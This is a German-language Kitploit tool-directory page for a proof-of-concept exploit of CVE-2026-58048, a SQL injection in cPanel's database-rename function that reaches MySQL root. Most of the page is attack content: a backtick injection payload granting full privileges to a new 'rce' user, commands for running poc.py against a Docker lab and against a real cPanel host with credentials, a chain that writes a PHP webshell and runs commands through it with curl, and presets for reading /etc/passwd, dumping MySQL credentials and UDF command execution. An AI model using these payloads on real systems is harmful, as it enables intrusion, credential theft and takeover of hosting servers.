Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
POC-CVE-2026-58048 — Security research project | Kitploit
Tools/GitHubGitHub/imbas007/poc-cve-2026-58048
Privilege EscalationExploitationWeb Application ExploitationWeb SecurityPenetration TestingDatabase SecurityLabs & Practice
GitHubimbas007/poc-cve-2026-58048

POC-CVE-2026-58048

Security research project

Repository anzeigen
1vor 16 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-58048

CVSS 4.0: 9.4 (Kritisch) | CWE-89: SQL Injection | NVD

Authentifizierter cPanel-Benutzer → beliebiges SQL als MySQL-Root über Datenbank-Umbenennung. cPanel behält die Sitzungs-sql_mode des Benutzers (ANSI_QUOTES) fälschlicherweise bei, wenn Umbenennungsvorgänge als Root ausgeführt werden — ein Backtick im Datenbanknamen bricht aus dem Bezeichner aus und injiziert SQL.

root@kitploit:~
name: db`; GRANT ALL ON *.* TO 'rce'@'%' IDENTIFIED BY 'pwned!'; -- 

Schnellstart (Docker-Lab)

root@kitploit:~
pip install -r requirements.txt

python3 simulate.py start   # start lab (MariaDB:13306, cPanel API:18080, Apache:18081)
python3 poc.py -t http://localhost:18080 --mysql-port 13306 --payload admin-user --verify
python3 simulate.py stop

Der Lab-Modus wird automatisch erkannt — kein --lab-Flag erforderlich.

Echtes cPanel-Ziel

root@kitploit:~
python3 poc.py -t https://cpanel.example.com:2083 -u user -p 'pass' \
    --payload admin-user --verify

Payload-Voreinstellungen

Benutzerdefiniertes SQL: --inject "GRANT ALL ON *.* TO 'x'@'%' IDENTIFIED BY 'y'"

Vollständige RCE-Kette (Lab)

root@kitploit:~
# 1. Write shell to web root
python3 poc.py -t http://localhost:18080 --mysql-port 13306 \
    --payload webshell --shell /var/www/html/shell.php

# 2. Execute commands via HTTP!
curl "http://localhost:18081/shell.php?0=id"

Betroffene Versionen

cPanel < 11.110.0.137, 11.118.0.71, 11.126.0.78, 11.134.0.48, 11.136.0.32; WP Squared < 11.138.1.6

Gegenmaßnahme: Aktualisieren oder die MySQL-Funktion für cPanel-Benutzer entziehen.

Referenzen

  • cPanel Advisory
  • SecurityOnline

Nur für autorisierte Sicherheitstests und zu Bildungszwecken.

Tool herunterladen
PresetWirkung
admin-user (Standard)MySQL-Administratorbenutzer rce erstellen
compact-adminKurzes Admin-Payload (<64 Zeichen — passt in die Namensbegrenzung von echtem cPanel; Prüfung: r/p)
webshellPHP-Shell über INTO OUTFILE schreiben (--shell /var/www/html/shell.php)
read-fileServerdatei über LOAD_FILE lesen (--file /etc/passwd)
dump-usersAlle MySQL-Anmeldedaten nach pwn.users exportieren
udf-rceOS-Befehlsausführung über UDF